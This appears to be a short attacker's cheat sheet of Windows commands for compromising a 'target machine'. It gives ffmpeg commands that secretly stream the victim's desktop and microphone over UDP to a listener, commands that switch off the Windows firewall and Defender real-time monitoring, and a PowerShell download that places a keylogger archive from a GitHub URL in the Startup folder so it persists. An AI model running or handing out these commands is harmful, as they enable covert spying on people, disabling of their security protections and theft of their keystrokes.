==========================================================
===/////////  for listerners ffmpeg  ///////////////======
==========================================================
  screen ffmpeg -i udp://0.0.0.0:10001 /root/Download/livestream.avi

  for server ffmpeg target machine
  =======================================
  (video only)
  \ffmpeg.exe -f gdigrab -i desktop -f dshow -f avi udp://192.168.1.157:10001
  (audio only)
  .\ffmpeg.exe -f dshow -i audio="Microphone (Realtek High Definition Audio)" -f avi udp://192.168.1.157:10001
  (video & audio)
  .\ffmpeg.exe -f dshow -i audio="Microphone (Realtek High Definition Audio)":video="desktop" -f avi udp://192.168.1.157:10001
  
===========================
trun off windows firewalls 
===========================
  netsh advfirewall set allprofiles state off
  Set-MpPreference -DisableRealtimeMonitoring $true
  
====================
available disk show
====================
  wmic logicaldisk get name
  
======================================= 
downloading keylooger to target pc
======================================
  Invoke-WebRequest -Uri 'https://github.com/HAXORK8880/commands/blob/main/python.zip?raw=true' -OutFile $ENV:UserProfile'\AppData\Roaming\Microsoft\Windows\Start    Menu\Programs\Startup\python.zip
